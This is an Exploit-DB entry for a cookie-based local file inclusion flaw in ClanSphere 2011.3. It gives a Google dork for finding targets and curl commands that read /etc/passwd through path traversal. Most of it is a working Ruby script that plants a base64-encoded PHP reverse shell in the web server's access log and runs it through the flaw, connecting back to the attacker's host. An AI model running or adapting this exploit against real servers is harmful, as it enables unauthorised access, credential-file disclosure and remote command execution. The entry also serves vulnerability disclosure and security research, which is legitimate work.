ClanSphere 2011.3 - 'cs_lang' Cookie Local File Inclusion

EDB-ID:

22181

CVE:





Platform:

PHP

Date:

2012-10-23


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Exploit Title: ClanSphere 2011.3 (cs_lang cookie parameter) Local File Include Vulnerability
Google Dork: "Copyright 2012 Seitentitel. All rights reserved." || inurl:index.php?mod=clansphere
Date: 10/22/2012
Author: Marco Tulio ~> blkhtc0rp
Vendor Homepage: http://www.csphere.eu
Version: 2011.3
Tested on: Centos 5.7, Ubuntu 8.04 and FreeBSD 8


Poc:
curl "http://server/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd%00.png"
curl "http://server/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd"
curl "http://server/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd%00"


Exploit:

#!/usr/bin/ruby

#
# ClanSphere 2011.3 (cs_lang) LFI exploit by blkhtc0rp
#
#
# ./clanSphere.rb "http://server/apps/clansphere_2011.3/" "/var/log/httpd/access_log" 192.168.1.221 12345
# [x] ClanSphere 2011.3 LFI Exploit
# [x] Author: blkhtc0rp
# [x] Reverse shell on 192.168.1.221:12345
#
#
# nc -lp 12345
# pwd
# /var/www/html/apps/clansphere_2011.3
# id
# uid=48(apache) gid=48(apache) groups=48(apache)
#
require 'net/http'
require 'base64'

host = ARGV[0]
log = ARGV[1]
ip = ARGV[2]
rev_port = ARGV[3]

abort("Usage: #{$0} <url> <log> <your_ip> <port>") unless ARGV.size == 4

uri = URI.parse(host)

cookie = "blah=blah; cs_lang=../../../../../../../../../../../../../../../.." + log + "%00.png"
headers = { 'Cookie' => cookie, 
            'User-Agent' => 'Mozilla/4.0 (PSP (PlayStation Portable); 5.03)' 
          }

# Tiny shell from the net lol.
shell = "\$ip = \'#{ip}\';\$port = #{rev_port}; if (!(\$sock=fsockopen(\$ip,\$port))) die; while(!feof(\$sock)){ \$command = fgets(\$sock);\$pipe = popen(\$command,'r'); while (!feof(\$pipe)) fwrite (\$sock, fgets(\$pipe)); pclose(\$pipe);}fclose(\$sock);"

enc = Base64.encode64(shell).gsub("\n",'')
sh_encoded = "<?php eval(base64_decode(#{enc}));?>"


puts "[x] ClanSphere 2011.3 LFI Exploit"
puts "[x] Author: blkhtc0rp"
puts "[x] Reverse shell on #{ip}:#{rev_port}"

# Inject base64 shell
req = Net::HTTP::Get.new(sh_encoded)
status = Net::HTTP.new(uri.host, uri.port).start do |http|
   http.request(req)
end

# Exec shell
req2 = Net::HTTP::Get.new(uri.path, headers)
status = Net::HTTP.new(uri.host, uri.port).start do |http|
   http.request(req2)
end